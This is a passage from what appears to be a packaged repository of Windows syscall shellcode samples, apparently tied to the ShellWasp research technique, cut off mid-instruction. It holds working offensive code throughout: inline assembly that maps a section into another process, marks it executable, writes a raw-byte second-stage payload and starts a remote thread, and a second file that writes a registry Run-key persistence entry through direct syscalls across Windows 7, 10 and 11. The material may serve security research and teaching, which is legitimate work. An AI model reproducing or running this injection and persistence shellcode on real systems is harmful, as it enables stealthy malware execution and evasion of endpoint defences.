FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 | FILE_RANDOM_ACCESS 0x00000800 | FILE_NON_DIRECTORY_FILE 0x00000040\r\n\tpush 0x0003 ; ULONG CreateDisposition \tOPEN_EXISTING = 3 FILE_OVERWRITE_IF 0x00000005 \r\n\tpush 0x1 ; ULONG ShareAccess \t2 \tFILE_SHARE_WRITE 1 \tFILE_SHARE_read\r\n\tpush 0x80 ; ULONG FileAttributes 128 0x80\tFILE_ATTRIBUTE_NORMAL\r\n\tpush 0x00000000 ; PLARGE_INTEGER AllocationSize\r\n\tpush dword ptr [ebp-0x48] ; out PIO_STATUS_BLOCK IoStatusBlock\r\n\tpush dword ptr [ebp-0x24] ; POBJECT_ATTRIBUTES ObjectAttributes\r\n\t push 0x120089; GENERIC_READ = 120089, ACCESS_MASK DesiredAccess\r\n\tlea ecx, [ebp-0x3dd]\r\n\tpush ecx ; PHANDLE FileHandle\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, [edi+0x18] ; NtCreateFile syscall\r\n\tcall ourSyscall\r\n\tmov edi, [esp+0xb0];\t0x84 + 0x22 = \r\n\r\n\tpush edi\r\n\r\n\t; start ntcreatesection\r\n\r\n\t; create SectionHandle\r\n\txor edx, edx\r\n\tmov [ebp-0x324], edx\r\n\r\n\t; create ObjectAttributes structure\r\n\t; todo\r\n\tmov [ebp-0x342], esp\r\n\r\n\t;create PLARGE_INTEGER MaximumSize\r\n\t; todo\r\n\t; PLARGE_INTEGER ByteOffset\r\n\txor ecx, ecx\r\n\tpush 0x13C000 ; high part 1294336 -> 0x13C000\r\n\tpush ecx \t; low part\r\n\tpush 0x50\r\n\tpush ecx \t; low part\r\n\tmov [ebp-0x348], esp\r\n\r\n\tmov ecx, [ebp-0x3dd] ; out HANDLE FileHandle not a pointer - handle\r\n\tpush ecx \t\t ; HANDLE FileHandle\r\n\tpush 0x1000000 ; ULONG AllocationAttributes UInt32 SEC_IMAGE = 0x1000000\r\n\tpush 0x00000002 ; ULONG SectionPageProtection / Page Attributes -- UInt32 PAGE_READONLY = 0x02;\r\n\r\n\tmov ecx, [ebp-0x348]\r\n\tpush 0 \t\t ; PLARGE_INTEGER MaximumSize\r\n\tpush 0x0 \t\t ; POBJECT_ATTRIBUTES ObjectAttributes NULL\r\n\tpush 0x10000000 \t; ACCESS_MASK DesiredAccess SECTION_ALL_ACCESS = 0x10000000, SECTION_MAP_WRITE | SECTION_MAP_READ | SECTION_MAP_EXECUT\r\n\tlea ecx, [ebp-0x324] \r\n\tpush ecx \t\t ; PHANDLE SectionHandle\r\n\tint 3\t ; breakpoint - remove if outside of debugger\t\r\n\tmov eax, [edi+0x14] ; NtCreateSection syscall\r\n\tcall ourSyscall\r\n\r\n\tmov edi, [esp+0x2c]\r\n\r\n\t;ViewSize -> 0\r\n\txor ecx, ecx\r\n\tpush ecx\r\n\tmov [ebp-0x98], ecx\r\n\tmov [ebp-0x88], ecx\r\n\r\n\tretry:\r\n\tpush edi\r\n\tpush 0x00000040 ; ULONG Protect PAGE_READWRITE 04 / PAGE_READONLY = 0x02\r\n\tpush 0x00000000 ; ULONG AllocationType NULL\r\n\tpush 0x00000001 ; DWORD InheritDisposition ViewShare \r\n\tlea ecx, [ebp-0x98]\r\n\tpush ecx \t\t ; PULONG ViewSize\r\n\tpush 0x00000000 ; PLARGE_INTEGER SectionOffset NULL\r\n\tpush 0x00000000 ; ULONG CommitSize\tNULL\r\n\tpush 0x00000000 ; ULONG stackZeroBits \tNULL\r\n\tlea ecx, [ebp-0x88]\r\n\tpush ecx ; PVOID *BaseAddress NULL\r\n\t// ; int 3\r\n\tmov ecx, dword ptr[ebp-0xbe] \t; \r\n\tmov ecx, dword ptr [ecx]\r\n\tpush ecx\t\t\t ; HANDLE ProcessHandle\r\n\tpush dword ptr [ebp-0x324] ; HANDLE SectionHandle\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, [edi+0x10] ; NtMapViewOfSection syscall\r\n\tcall ourSyscall\r\n\r\n\tmov edi, [esp+0x28] ; 0x28 + 0x4 = \r\n\tpush edi\r\n\r\n\t;;start NtProtectVirtualMemory\r\n\txor ecx, ecx\r\n\tpush ecx\r\n\tpush ecx\r\n\tpush ecx\r\n\tpush ecx\r\n\tpush ecx\r\n\tpush 0x0000a12c \t\t\t\t; desired size\r\n\tmov [ebp-0x64], esp \r\n\r\n\txor ecx, ecx\r\n\tpush ecx\r\n\tpush ecx\r\n\tmov [ebp-0x424], esp\r\n\r\n\tmov ecx, [ebp-0x424]\r\n\tpush ecx \t\t ; PULONG OldAccessProtection\r\n\tpush 0x00000040 ; ULONG NewAccessProtection\r\n\tmov ecx, [ebp-0x64]\r\n\tpush ecx \t ; PULONG NumberOfBytesToProtect\r\n\tlea ecx, [ebp-0x88]\r\n\tpush ecx \t ; PVOID *BaseAddress\r\n\tmov ecx, dword ptr[ebp-0xbe] \t; \r\n\tmov ecx, dword ptr [ecx]\r\n\tpush ecx\t\t ; HANDLE ProcessHandle\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\t// mov eax, 0x4D ; NtProtectVirtualMemory syscall\r\n\tmov eax, [edi+0xc] ; NtProtectVirtualMemory syscall\r\n\tcall ourSyscall\r\n\r\n\tmov edi, [esp+0x34] ; 0x14 + 20= 34\r\n\tpush edi\r\n\r\n\t;;; start ntwritevirtualmemory\r\n\r\n\tpush 0\t\t\t\t\t\t\t\t; PULONG NumberOfBytesWritten\r\n\tpush 0x100 \t\t\t\t\t\t\t; ULONG NumberOfBytesToWrite\r\n\r\n\t; Note: The inline Assembly (VS) way of doing self-location is a little screwy, so traditional call pop way does not work as easily as it word doing NASM. This is one place where an adjustment is necessary when converting to shellcode\r\n\r\n\tlea ecx, ourShell\r\n\tadd ecx, 0x4\r\n\tpush ecx \t\t\t\t\t\t\t; PVOID Buffer\r\n\r\n\tlea ecx, [ebp-0x88]\r\n\tmov edx, dword ptr [ecx]\r\n\tadd edx, 0x3000\r\n\tmov dword ptr [ebp-0x88], edx\r\n\tmov ecx, [ebp-0x88]\r\n\tpush ecx \t\t\t\t\t\t; PVOID BaseAddress\r\n\tmov ecx, dword ptr[ebp-0xbe] \t\r\n\tmov ecx, dword ptr [ecx]\r\n\tpush ecx \t\t\t\t\t\t; HANDLE ProcessHandle\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\r\n\tmov eax, [edi+0x8] ; NtWriteVirtualMemory syscall\r\n\tcall ourSyscall\r\n\t \r\n\tmov edi, [esp+0x14]\r\n\tpush edi\r\n\r\n\txor edx, edx\r\n\r\n\tpush edx \t\t\t\t\t\t; NULL pBytesBuffer\r\n\tpush edx \t\t\t\t\t\t; NULL sizeOfStackReserve\r\n\tpush edx \t\t\t\t\t\t; NULL sizeOfStackCommit\r\n\tpush edx \t\t\t\t\t\t; NULL stackZeroBits\r\n\tpush edx \t\t\t\t\t\t; FALSE bCreateSuspsended\r\n\tpush edx \t\t\t\t\t\t; 0 lpParameter\r\n\r\n\tmov ebx, dword ptr[ebp - 0x88]\t\t\r\n\tpush ebx \t\t\t\t\t\t; pMemoryAllocation StartRoutine \r\n\tmov ecx, dword ptr[ebp-0xbe] \t; ProcessHandle\r\n\tmov ecx, dword ptr [ecx]\r\n\tpush ecx \t\t\t\t\t\t; hCurrentProcess\r\n\tpush 0 \t\t\t\t\t\t\t; pObjectAttributes\r\n\tpush 0x1fffff \t\t\t\t\t; PROCESS_ALL_ACCESS; 0x3e0000 desiredACcess = Specific_rights_all + standard_rights_all\r\n\tmov dword ptr[ebp - 0x290], 0 ; hThread\r\n\tlea ecx, dword ptr[ebp - 0x290] ; hThread\r\n\tpush ecx ; hThread\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, [edi+0x4] ; NtCreateThreadEx syscall\r\n\tcall ourSyscall\r\n\tmov edi, [esp+0x2c]\r\n\tpush edi\r\n\r\n\tpush 0 \t\t\t\t\t\t\t\t ; PLARGE_INTEGER TimeOut\r\n\tpush 1\t; \t\t\t\t\t\t ; BOOLEAN Alertable TRUE\r\n\tpush dword ptr[ebp - 0x290] ; HANDLE ObjectHandle\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\tmov eax, [edi] ; NtWaitForSingleObject syscall\r\n\tcall ourSyscall\r\n\tmov edi, [esp+0xc]\r\n\tpush edi\r\n\r\n\tint 3 ; breakpoint - remove if outside of debugger\r\n\r\n\r\n; This is the stage two payload. The _emit keyword is how you can create those in inline Assembly for Visual Studio. In traditional shellcode, we would present this in a different way. The stage two payload is just a simple POC messagebox, but it could be exchanged for anything. There are other ways of doing this in inline ASsembly, but I prefer this way, as it is closer to actual shellcode.\r\n\r\n\tourShell:\r\n\t_emit 0x90\r\n\t_emit 0x90\r\n\t_emit 0x90\r\n\t_emit 0x90\r\n\t_emit 0x31\r\n\t_emit 0xc9\r\n\t_emit 0xf7\r\n\t_emit 0xe1\r\n\t_emit 0x64\r\n\t_emit 0x8b\r\n\t_emit 0x41\r\n\t_emit 0x30\r\n\t_emit 0x8b\r\n\t_emit 0x40\r\n\t_emit 0x0c\r\n\t_emit 0x8b\r\n\t_emit 0x70\r\n\t_emit 0x14\r\n\t_emit 0xad\r\n\t_emit 0x96\r\n\t_emit 0xad\r\n\t_emit 0x8b\r\n\t_emit 0x58\r\n\t_emit 0x10\r\n\t_emit 0x8b\r\n\t_emit 0x53\r\n\t_emit 0x3c\r\n\t_emit 0x01\r\n\t_emit 0xda\r\n\t_emit 0x8b\r\n\t_emit 0x52\r\n\t_emit 0x78\r\n\t_emit 0x01\r\n\t_emit 0xda\r\n\t_emit 0x8b\r\n\t_emit 0x72\r\n\t_emit 0x20\r\n\t_emit 0x01\r\n\t_emit 0xde\r\n\t_emit 0x31\r\n\t_emit 0xc9\r\n\t_emit 0x41\r\n\t_emit 0xad\r\n\t_emit 0x01\r\n\t_emit 0xd8\r\n\t_emit 0x81\r\n\t_emit 0x38\r\n\t_emit 0x47\r\n\t_emit 0x65\r\n\t_emit 0x74\r\n\t_emit 0x50\r\n\t_emit 0x75\r\n\t_emit 0xf4\r\n\t_emit 0x81\r\n\t_emit 0x78\r\n\t_emit 0x04\r\n\t_emit 0x72\r\n\t_emit 0x6f\r\n\t_emit 0x63\r\n\t_emit 0x41\r\n\t_emit 0x75\r\n\t_emit 0xeb\r\n\t_emit 0x81\r\n\t_emit 0x78\r\n\t_emit 0x08\r\n\t_emit 0x64\r\n\t_emit 0x64\r\n\t_emit 0x72\r\n\t_emit 0x65\r\n\t_emit 0x75\r\n\t_emit 0xe2\r\n\t_emit 0x8b\r\n\t_emit 0x72\r\n\t_emit 0x24\r\n\t_emit 0x01\r\n\t_emit 0xde\r\n\t_emit 0x66\r\n\t_emit 0x8b\r\n\t_emit 0x0c\r\n\t_emit 0x4e\r\n\t_emit 0x49\r\n\t_emit 0x8b\r\n\t_emit 0x72\r\n\t_emit 0x1c\r\n\t_emit 0x01\r\n\t_emit 0xde\r\n\t_emit 0x8b\r\n\t_emit 0x14\r\n\t_emit 0x8e\r\n\t_emit 0x01\r\n\t_emit 0xda\r\n\t_emit 0x89\r\n\t_emit 0xd5\r\n\t_emit 0x31\r\n\t_emit 0xc9\r\n\t_emit 0x51\r\n\t_emit 0x68\r\n\t_emit 0x61\r\n\t_emit 0x72\r\n\t_emit 0x79\r\n\t_emit 0x41\r\n\t_emit 0x68\r\n\t_emit 0x4c\r\n\t_emit 0x69\r\n\t_emit 0x62\r\n\t_emit 0x72\r\n\t_emit 0x68\r\n\t_emit 0x4c\r\n\t_emit 0x6f\r\n\t_emit 0x61\r\n\t_emit 0x64\r\n\t_emit 0x54\r\n\t_emit 0x53\r\n\t_emit 0xff\r\n\t_emit 0xd2\r\n\t_emit 0x68\r\n\t_emit 0x6c\r\n\t_emit 0x6c\r\n\t_emit 0x61\r\n\t_emit 0x61\r\n\t_emit 0x66\r\n\t_emit 0x81\r\n\t_emit 0x6c\r\n\t_emit 0x24\r\n\t_emit 0x02\r\n\t_emit 0x61\r\n\t_emit 0x61\r\n\t_emit 0x68\r\n\t_emit 0x33\r\n\t_emit 0x32\r\n\t_emit 0x2e\r\n\t_emit 0x64\r\n\t_emit 0x68\r\n\t_emit 0x55\r\n\t_emit 0x73\r\n\t_emit 0x65\r\n\t_emit 0x72\r\n\t_emit 0x54\r\n\t_emit 0xff\r\n\t_emit 0xd0\r\n\t_emit 0x68\r\n\t_emit 0x6f\r\n\t_emit 0x78\r\n\t_emit 0x41\r\n\t_emit 0x61\r\n\t_emit 0x66\r\n\t_emit 0x83\r\n\t_emit 0x6c\r\n\t_emit 0x24\r\n\t_emit 0x03\r\n\t_emit 0x61\r\n\t_emit 0x68\r\n\t_emit 0x61\r\n\t_emit 0x67\r\n\t_emit 0x65\r\n\t_emit 0x42\r\n\t_emit 0x68\r\n\t_emit 0x4d\r\n\t_emit 0x65\r\n\t_emit 0x73\r\n\t_emit 0x73\r\n\t_emit 0x54\r\n\t_emit 0x50\r\n\t_emit 0xff\r\n\t_emit 0xd5\r\n\t_emit 0x83\r\n\t_emit 0xc4\r\n\t_emit 0x10\r\n\t_emit 0x31\r\n\t_emit 0xd2\r\n\t_emit 0x31\r\n\t_emit 0xc9\r\n\t_emit 0x52\r\n\t_emit 0x68\r\n\t_emit 0x50\r\n\t_emit 0x77\r\n\t_emit 0x6e\r\n\t_emit 0x64\r\n\t_emit 0x89\r\n\t_emit 0xe7\r\n\t_emit 0x52\r\n\t_emit 0x68\r\n\t_emit 0x59\r\n\t_emit 0x65\r\n\t_emit 0x73\r\n\t_emit 0x73\r\n\t_emit 0x89\r\n\t_emit 0xe1\r\n\t_emit 0x52\r\n\t_emit 0x57\r\n\t_emit 0x51\r\n\t_emit 0x52\r\n\t_emit 0xff\r\n\t_emit 0xd0\r\n\t_emit 0x83\r\n\t_emit 0xc4\r\n\t_emit 0x10\r\n\t_emit 0x68\r\n\t_emit 0x65\r\n\t_emit 0x73\r\n\t_emit 0x73\r\n\t_emit 0x61\r\n\t_emit 0x66\r\n\t_emit 0x83\r\n\t_emit 0x6c\r\n\t_emit 0x24\r\n\t_emit 0x03\r\n\t_emit 0x61\r\n\t_emit 0x68\r\n\t_emit 0x50\r\n\t_emit 0x72\r\n\t_emit 0x6f\r\n\t_emit 0x63\r\n\t_emit 0x68\r\n\t_emit 0x45\r\n\t_emit 0x78\r\n\t_emit 0x69\r\n\t_emit 0x74\r\n\t_emit 0x54\r\n\t_emit 0x53\r\n\t_emit 0xff\r\n\t_emit 0xd5\r\n\t_emit 0x31\r\n\t_emit 0xc9\r\n\t_emit 0x51\r\n\t_emit 0xff\r\n\t_emit 0xd0\r\n\r\n\tend2:\r\n\tnop\r\n\t}\r\n\treturn 0;\r\n}\r\n" }, { "path": "Samples/alternative_create_process.asm", "content": "\r\n; Author: Shelby VandenHoek (VERONA Labs)\r\n; This was made to highlight the ShellWasp technique for syscall shellcode. Note - Shelby used a slightly earlier\r\n; version of ShellWasp, which has since changed. His shellcode still works on Win 7, 10, and 11.\r\n\r\n; This is a way to create persistence via registry - in this case, for calculator! \r\n\r\n; This is a total reworking/reimaging of an original 2005 syscall shellcode by P. Bania. The way of invoking the \r\n; syscall then is obsolete now, so I told Shelby (then my employee and student) to recreate it from scratch using the \r\n; ShellWasp technique. I had searched long and hard for any syscall shellcode that was non-Egghunter in nature, and Bania's\r\n; was the only one that I could find. The original had used hardcoded syscall values - clearly a practice we \r\n; would avoid today.\r\n\r\n\r\n; Original: http://piotrbania.com/all/articles/windows_syscall_shellcode.pdf\r\n\r\n[bits 32]\r\n\r\n\tmov ebx,DWORD [fs:0x30]\r\n\tmov ebx, dword [ebx+0xac]\r\n\tmov ecx, esp\r\n\tsub esp, 0x1000\r\n\tcmp bl, 0x64 ; 21H2, Win10 release\r\n\tjl less1\r\n\tpush 0x7002c ; NtTerminateProcess\r\n\tpush 0x3000f ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless1:\r\n\tcmp bl, 0x63 \t\t\t; 21h1, Win10 release\r\n jl less2\r\n push 0x7002c \t\t\t; NtTerminateProcess\r\n push 0x3000f\t\t\t; NtClose\r\n push 0x60\t\t\t\t; NtSetValueKey\r\n push 0x1d\t\t\t\t; NtCreateKey\r\n jmp saveSyscallArray\r\n\tless2:\r\n\tcmp bl, 0x62 ; 20H2, Win10 release\r\n\tjl less3\r\n\tpush 0x2c ; NtTerminateProcess\r\n\tpush 0xf ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless3:\r\n\tcmp bl, 0xF0 ; 21H2, Win11 release\r\n\tjl less4\r\n\tpush 0x7002c ; NtTerminateProcess\r\n\tpush 0x3003f ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless4:\r\n\tcmp bl, 0x61 ; 2004, Win10 release\r\n\tjl less5\r\n\tpush 0x2c ; NtTerminateProcess\r\n\tpush 0xf ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless5:\r\n\tcmp bl, 0xBB ; 1909, Win10 release\r\n\tjl less6\r\n\tpush 0x2c ; NtTerminateProcess\r\n\tpush 0xf ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless6:\r\n\tcmp bl, 0xBA ; 1903, Win10 release\r\n\tjl less7\r\n\tpush 0x2c ; NtTerminateProcess\r\n\tpush 0xf ; NtClose\r\n\tpush 0x60 ; NtSetValueKey\r\n\tpush 0x1d ; NtCreateKey\r\n\tjmp saveSyscallArray\r\n\tless7:\r\n\tcmp bl, 0xB1 ; Win7, Sp1 release\r\n\tjl end\r\n\tpush 0x29 ; NtTerminateProcess\r\n\tpush 0xc ; NtClose\r\n\tpush 0x5d ; NtSetValueKey\r\n\tpush 0x1a ; NtCreateKey\r\n\tsaveSyscallArray:\r\n\tmov edi, esp\r\n\tmov esp, ecx\r\n\r\n\r\n\tsub\tesp, 0x400\t; Storage for Params\r\n\r\n; Length without NULL: 0x7e\r\n; Length with NULL: 0x80\r\n; UTF-16: \\Registry\\Machine\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\txor edx, edx\r\n\tpush edx\r\n\tmov dl, 0x6e\r\n\tpush dx\r\n\tmov dl, 0x75\r\n\tpush dx\r\n\tmov dl, 0x52\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x6e\r\n\tpush dx\r\n\tmov dl, 0x6f\r\n\tpush dx\r\n\tmov dl, 0x69\r\n\tpush dx\r\n\tmov dl, 0x73\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x56\r\n\tpush dx\r\n\tmov dl, 0x74\r\n\tpush dx\r\n\tmov dl, 0x6e\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x75\r\n\tpush dx\r\n\tmov dl, 0x43\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x73\r\n\tpush dx\r\n\tmov dl, 0x77\r\n\tpush dx\r\n\tmov dl, 0x6f\r\n\tpush dx\r\n\tmov dl, 0x64\r\n\tpush dx\r\n\tmov dl, 0x6e\r\n\tpush dx\r\n\tmov dl, 0x69\r\n\tpush dx\r\n\tmov dl, 0x57\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x74\r\n\tpush dx\r\n\tmov dl, 0x66\r\n\tpush dx\r\n\tmov dl, 0x6f\r\n\tpush dx\r\n\tmov dl, 0x73\r\n\tpush dx\r\n\tmov dl, 0x6f\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x63\r\n\tpush dx\r\n\tmov dl, 0x69\r\n\tpush dx\r\n\tmov dl, 0x4d\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x61\r\n\tpush dx\r\n\tmov dl, 0x77\r\n\tpush dx\r\n\tmov dl, 0x74\r\n\tpush dx\r\n\tmov dl, 0x66\r\n\tpush dx\r\n\tmov dl, 0x6f\r\n\tpush dx\r\n\tmov dl, 0x53\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x6e\r\n\tpush dx\r\n\tmov dl, 0x69\r\n\tpush dx\r\n\tmov dl, 0x68\r\n\tpush dx\r\n\tmov dl, 0x63\r\n\tpush dx\r\n\tmov dl, 0x61\r\n\tpush dx\r\n\tmov dl, 0x4d\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov dl, 0x79\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x74\r\n\tpush dx\r\n\tmov dl, 0x73\r\n\tpush dx\r\n\tmov dl, 0x69\r\n\tpush dx\r\n\tmov dl, 0x67\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x52\r\n\tpush dx\r\n\tmov dl, 0x5c\r\n\tpush dx\r\n\tmov [ebp-4], esp ; REG_PATH\r\n\r\n; Length without NULL: 0x38\r\n; Length with NULL: 0x3a\r\n; UTF-16: c:\\Windows\\System32\\calc.exe\r\n xor edx, edx\r\n push edx\r\n mov dl, 0x65\r\n push dx\r\n mov dl, 0x78\r\n push dx\r\n mov dl, 0x65\r\n push dx\r\n mov dl, 0x2e\r\n push dx\r\n mov dl, 0x63\r\n push dx\r\n mov dl, 0x6c\r\n push dx\r\n mov dl, 0x61\r\n push dx\r\n mov dl, 0x63\r\n push dx\r\n mov dl, 0x5c\r\n push dx\r\n mov dl, 0x32\r\n push dx\r\n mov dl, 0x33\r\n push dx\r\n mov dl, 0x6d\r\n push dx\r\n mov dl, 0x65\r\n push dx\r\n mov dl, 0x74\r\n push dx\r\n mov dl, 0x73\r\n push dx\r\n mov dl, 0x79\r\n push dx\r\n mov dl, 0x53\r\n push dx\r\n mov dl, 0x5c\r\n push dx\r\n mov dl, 0x73\r\n push dx\r\n mov dl, 0x77\r\n push dx\r\n mov dl, 0x6f\r\n push dx\r\n mov dl, 0x64\r\n push dx\r\n mov dl, 0x6e\r\n push dx\r\n mov dl, 0x69\r\n push dx\r\n mov dl, 0x57\r\n push dx\r\n mov dl, 0x5c\r\n push dx\r\n mov dl, 0x3a\r\n push dx\r\n mov dl, 0x43\r\n push dx\r\n mov [ebp-8], esp ; CALC_PATH\r\n\r\n; Length without NULL: 0x26\r\n; Length with NULL: 0x28\r\n; UTF-16: Syscall Created Key\r\n\txor edx, edx\r\n\tpush edx\r\n\tmov dl, 0x79\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x4b\r\n\tpush dx\r\n\tmov dl, 0x20\r\n\tpush dx\r\n\tmov dl, 0x64\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x74\r\n\tpush dx\r\n\tmov dl, 0x61\r\n\tpush dx\r\n\tmov dl, 0x65\r\n\tpush dx\r\n\tmov dl, 0x72\r\n\tpush dx\r\n\tmov dl, 0x43\r\n\tpush dx\r\n\tmov dl, 0x20\r\n\tpush dx\r\n\tmov dl, 0x6c\r\n\tpush dx\r\n\tmov dl, 0x6c\r\n\tpush dx\r\n\tmov dl, 0x61\r\n\tpush dx\r\n\tmov dl, 0x63\r\n\tpush dx\r\n\tmov dl, 0x73\r\n\tpush dx\r\n\tmov dl, 0x79\r\n\tpush dx\r\n\tmov dl, 0x53\r\n\tpush dx\r\n\tmov [ebp-12], esp ; VALUE_NAME\r\n\r\n; UNICODE_STRING ValueName\r\n\txor edx, edx\r\n\tpush dword [ebp-12] ; Buffer\r\n\tmov dx, 0x28\r\n\tpush dx ; Max Length\r\n\tmov dx, 0x26\r\n\tpush dx ; Length\r\n\tmov [ebp-16], esp ; US_VALUE_NAME\r\n\r\n; UNICODE_STRING REG_PATH\r\n\txor edx, edx\r\n\tpush dword [ebp-4] ; Buffer\r\n\tmov dx, 0x80\r\n\tpush dx ; Max Length\r\n\tmov dx, 0x7E\r\n\tpush dx ; Length\r\n\tmov [ebp-20], esp ; US_REG_PATH\r\n\r\n; _OBJECT_ATTRIBUTES\r\n\txor edx, edx\r\n\txor ecx, ecx\r\n\tpush edx ; SecurityQualityOfService = NULL\r\n\tpush edx ; SecurityDescriptor = NULL\r\n\tinc ecx\r\n\tshl ecx, 6\r\n\tpush ecx ; Attributes = OBJ_CASE_INSENSITIVE = 0x40 \r\n push dword [ebp-20] ; US_REG_PATH\r\n\tpush edx ; Root Directory = NULL\r\n\tpush 0x18 ; Length\r\n\tmov [ebp-24], esp ; OBJECT_ATTR\r\n\r\n; KeyHandle\r\n\txor edx, edx\r\n\tpush edx\r\n\tmov [ebp-28], esp ; PKEY_HANDLE\r\n\r\n; Access Mask:\r\n; KEY_ALL_ACCESS = 0xF003F\r\n; Will Use Virtual Registry\r\n; Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\t; xor ecx, ecx\r\n\t; inc ecx ; 0x1\r\n\t; shl ecx, 4 ; 0x10\r\n\t; mov edx, ecx\r\n\t; dec ecx ; 0xF\r\n\t; shl ecx, 16 ; 0xF0000\r\n\t; shl edx, 2 ; 0x40\r\n\t; dec edx ; 0x3F\r\n\t; add ecx, edx ; 0xF0000 + 0x3F = 0xF003F \r\n\t; mov [ebp-32], ecx ; ACCESS_MASK\r\n\r\n; KEY_ALL_ACCESS | KEY_WOW64_64KEY = 0xF013F\r\n; Will Use Normal Registry\r\n; Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\txor ecx, ecx\r\n\tinc ecx ; 0x1\r\n\tshl ecx, 4 ; 0x10\r\n\tmov edx, ecx\r\n\tdec ecx ; 0xF\r\n\tshl ecx, 16 ; 0xF0000\r\n\tshl edx, 2 ; 0x40\r\n\tdec edx ; 0x3F\r\n\tadd ecx, edx ; 0xF0000 + 0x3F = 0xF003F \r\n\txor edx, edx\r\n\tinc edx ; 0x1\r\n\tshl edx, 8 ; 0x100\r\n\tadd ecx, edx ; 0xF003F + 0x100 = 0xF013F\r\n\tmov [ebp-32], ecx\r\n\r\n; KEY_SET_VALUE = 0x2\r\n; Will Use Virtual Registry\r\n; Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\t; xor ecx, ecx\r\n\t; inc ecx ; 0x1\r\n\t; inc ecx ; 0x2\r\n\t; mov [ebp-32], ecx ; ACCESS_MASK\r\n\r\n; KEY_SET_VALUE | KEY_WOW64_64KEY = 0x102\r\n; Will Use Normal Registry\r\n; Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\t; xor ecx, ecx\r\n\t; inc ecx ; 0x1\r\n\t; shl ecx, 8 ; 0x100\r\n\t; inc ecx ; 0x101\r\n\t; inc ecx ; 0x102\r\n\t; mov [ebp-32], ecx ; ACCESS_MASK\r\n\r\nNtCreateKey:\r\n push edi ; Save Syscall Array\r\n\txor edx, edx\r\n push edx ; KEY_DISPOSITION = NULL\r\n\tpush edx ; Create Options REG_OPTION_NON_VOLATILE = 0x0\r\n\tpush edx ; Class = NULL\r\n\tpush edx ; TitleIndex = 0x0\r\n push dword [ebp-24] ; OBJECT_ATTR\r\n push dword [ebp-32] ; ACCESS_MASK\r\n push dword [ebp-28] ; PKEY_HANDLE\r\n\tmov eax, [edi]\r\n\tcall syscallFunc\r\n\tadd esp, 28\r\n pop edi ; Get Syscall Array\r\n\r\n xor ecx, ecx\r\n cmp eax, ecx\r\n jne NtTerminateProcess\r\n\r\nRegSetValueKey:\r\n push edi ; Save Syscall Array\r\n xor edx, edx\r\n push 0x38\r\n push dword [ebp-8] ; CALC_PATH\r\n inc edx\r\n push edx ; Type: REG_SZ = 0x1\r\n dec edx\r\n push edx ; Title Index = 0x0\r\n push dword [ebp-16] ; US_VALUE_NAME\r\n mov eax, [ebp-28] ; PKEY_HANDLE\r\n push dword [eax]\r\n mov eax, [edi+4]\r\n call syscallFunc\r\n add esp, 24\r\n pop edi ; Get Syscall Array\r\n\r\nNtClose:\r\n push edi ; Save Syscall Array\r\n mov eax, [ebp-28] ; PKEY_HANDLE\r\n push dword [eax]\r\n mov eax, [edi+8]\r\n call syscallFunc\r\n add esp, 4\r\n pop edi ; Get Syscall Array\r\n\r\n\r\nNtTerminateProcess:\r\n push edi ; Save Syscall Array\r\n\txor edx, edx\r\n\tpush edx\r\n\tpush edx\r\n\tmov eax, [edi+12]\r\n\tcall syscallFunc\r\n add esp, 8\r\n\r\njmp skipSyscall\r\nsyscallFunc:\r\n\tmov ebx,DWORD [fs:0x30]\r\n mov ebx, [ebx+0xa4] ; OS Major Version\r\n cmp bl, 10\r\n jne win7 \r\n win10:\r\n\t call [fs:0xc0]\r\n\t ret \r\n win7:\r\n xor ecx, 